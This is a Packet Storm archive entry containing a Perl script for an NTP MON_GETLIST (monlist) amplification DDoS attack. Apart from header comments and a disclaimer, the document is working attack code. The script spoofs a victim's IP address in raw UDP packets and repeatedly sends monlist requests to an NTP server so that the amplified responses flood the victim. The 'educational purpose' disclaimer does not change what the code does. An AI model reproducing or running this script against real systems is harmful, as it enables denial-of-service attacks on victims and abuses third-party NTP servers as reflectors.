NTP MON_GETLIST Query Amplification DDoS

2015-07-09T00:00:00
ID PACKETSTORM:132622
Type packetstorm
Reporter Todor Donev
Modified 2015-07-09T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# ntp MON_GETLIST query amplification ddos  
#  
# Copyright 2015 (c) Todor Donev   
# todor.donev@gmail.com  
# http://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
#  
# A Network Time Protocol (NTP) Amplification   
# attack is an emerging form of Distributed   
# Denial of Service (DDoS) that relies on the   
# use of publically accessible NTP servers to   
# overwhelm a victim system with UDP traffic.  
# The NTP service supports a monitoring service   
# that allows administrators to query the server   
# for traffic counts of connected clients. This   
# information is provided via the “monlist”   
# command. The basic attack technique consists   
# of an attacker sending a "get monlist" request   
# to a vulnerable NTP server, with the source   
# address spoofed to be the victim’s address.   
#  
#  
# Disclaimer:  
# This or previous program is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash,  
# system compromise, etc.) caused by the use  
# of these programs is not Todor Donev's  
# responsibility.  
#  
# Use at your own risk and educational   
# purpose ONLY!  
#  
# See also, UDP-based Amplification Attacks:  
# https://www.us-cert.gov/ncas/alerts/TA14-017A  
#  
#  
  
use Socket;  
  
if ( $< != 0 ) {  
print "Sorry, must be run as root!\n";  
print "This script use RAW Socket.\n";   
exit;  
}  
  
my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)  
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)  
  
print "[ ntpd MON_GETLIST query amplification ]\n";  
if (!defined $ntpd || !defined $victim) {  
print "[ Usg: $0 <ntp server> <victim>\n";  
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";  
exit;  
}  
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";  
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;  
setsockopt(RAW, 0, 1, 1) or die $!;  
main();  
  
# Main program  
sub main {  
my $packet;  
  
$packet = iphdr();  
$packet .= udphdr();  
$packet .= ntphdr();  
# b000000m...  
send_packet($packet);  
}  
  
# IP header (Layer 3)  
sub iphdr {  
my $ip_ver = 4; # IP Version 4 (4 bits)  
my $iphdr_len = 5; # IP Header Length (4 bits)  
my $ip_tos = 0; # Differentiated Services (8 bits)  
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)  
my $ip_frag_id = 0; # Identification Field (16 bits)  
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)  
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)  
my $ip_ttl = 255; # IP TTL (8 bits)  
my $ip_proto = 17; # IP Protocol (8 bits)  
my $ip_checksum = 0; # IP Checksum (16 bits)  
  
# IP Packet  
my $iphdr = pack(  
'H2 H2 n n B16 h2 c n a4 a4',  
$ip_ver . $iphdr_len, $ip_tos,   
$ip_total_len, $ip_frag_id,   
$ip_frag_flag . $ip_frag_offset,  
$ip_ttl, $ip_proto, $ip_checksum,  
$victim, $ntpd  
);  
return $iphdr;  
}  
  
# UDP Header (Layer 4)  
sub udphdr {  
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)  
my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)  
my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)  
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)  
  
# UDP Packet  
my $udphdr = pack(  
'n n n n',  
$udp_src_port,   
$udp_dst_port,  
$udp_len,   
$udp_checksum  
);  
return $udphdr;  
}  
  
# NTP Header (Layer 7)  
sub ntphdr {  
my $rm_vn_mode = 0x27;  
  
# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7  
#  
# A mode 7 packet is used exchanging data between an NTP server  
# and a client for purposes other than time synchronization, e.g.  
# monitoring, statistics gathering and configuration. A mode 7  
# packet has the following format:  
#  
# 0 1 2 3  
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# | Err | Number of data items | MBZ | Size of data item |  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# | |  
# | Data (Minimum 0 octets, maximum 500 octets) |  
# | |  
# | [...] |  
# | |  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# | Encryption Keyid (when A bit set) |  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
# | |  
# | Message Authentication Code (when A bit set) |  
# | |  
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
#  
# where the fields are (note that the client sends requests, the server  
# responses):  
# Response Bit: This packet is a response (if clear, packet is a request).  
# More Bit: Set for all packets but the last in a response which  
# requires more than one packet.  
# Version Number: 2 for current version  
# Mode: Always 7  
my $auth = 0x00; # If set, this packet is authenticated.  
  
my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)  
# The number of the implementation this request code  
# is defined by. An implementation number of zero is used  
# for requst codes/data formats which all implementations  
# agree on. Implementation number 255 is reserved (for  
# extensions, in case we run out).  
  
my $request = 0x2a; # Request code is an implementation-specific code which specifies the  
# operation to be (which has been) performed and/or the  
# format and semantics of the data included in the packet   
# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),  
# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)   
# NTP packet  
my $ntphdr = pack(  
'W2 C2 C2 C2',   
$rm_vn_mode,  
$auth,  
$implementation,   
$request  
);  
return $ntphdr;  
}  
  
sub send_packet {  
while(1){  
select(undef, undef, undef, 0.30); # Sleep 300 milliseconds  
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;  
}  
}  
  
  
`